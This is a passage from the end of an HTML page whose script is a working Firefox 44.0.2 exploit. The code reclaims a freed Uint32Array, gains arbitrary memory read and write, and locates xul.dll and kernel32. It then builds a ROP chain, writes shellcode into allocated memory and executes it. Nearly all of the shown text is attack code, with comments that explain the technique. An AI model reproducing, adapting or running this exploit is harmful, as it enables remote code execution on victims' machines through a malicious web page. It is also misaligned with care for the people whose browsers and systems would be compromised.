1168 |             window.location = href[0] + "?continue=" + spray.getNextAddr(addr);
1169 |         }
1170 |         return;
1171 |     }
1172 | 
1173 |     /*
1174 |      * reallocate the freed Uint32Array
1175 |      */
1176 |     hijacked = spray.findArray(nodes, spray.arrays());
1177 | 
1178 |     /*
1179 |      * setup helpers
1180 |      */
1181 |     const rwx = new ReadWriteExecute(spray.nodeBase, nodes, hijacked);
1182 | 
1183 |     /* The first 4 bytes of the previously leaked [xul!nsHtml5Atoms::style]
1184 |      * contain the address of xul!PermanentAtomImpl::`vftable'.
1185 |      *
1186 |      * Note that the subtracted offset is specific to firefox 44.0.2.
1187 |      * However, since we can read arbitrary memory by this point, the
1188 |      * base of xul could easily (albeit perhaps somewhat slowly) be
1189 |      * located by searching for a PE signature */
1190 |     const xulBase = rwx.readDWord(addr) - 0x1c1f834;
1191 | 
1192 |     log("style found at 0x" + addr.toString(16));
1193 |     log("xul.dll found at 0x" + xulBase.toString(16));
1194 | 
1195 |     const xulPE = new PortableExecutable(xulBase, rwx);
1196 |     xulPE.read();
1197 |     const rop = new ROPHelper(xulPE, rwx);
1198 |     const kernel32 = new KERNEL32(rop, xulPE, rwx);
1199 |     const kernel32handle = kernel32.GetModuleHandleA("kernel32.dll");
1200 |     const kernel32PE = new PortableExecutable(kernel32handle, rwx);
1201 |     kernel32PE.read();
1202 |     const ntdll = new NTDLL(rop, kernel32PE, rwx);
1203 |     const icuuc55 = new ICUUC55(rop, xulPE, rwx);
1204 | 
1205 |     /*
1206 |      * execute shellcode
1207 |      */
1208 |     const stack = ntdll.getStackLimit(kernel32.GetCurrentThread());
1209 |     const exec = icuuc55.alloc(stack, shellcode.length);
1210 |     const proc = xulPE.search("kernel32.dll", "GetProcAddress");
1211 |     rwx.writeString(exec, shellcode.join(""));
1212 |     rop.execute(exec, [kernel32handle, proc], true);
1213 | };
1214 | </script>
1215 | </head>
1216 | </html>
1217 | 


--------------------------------------------------------------------------------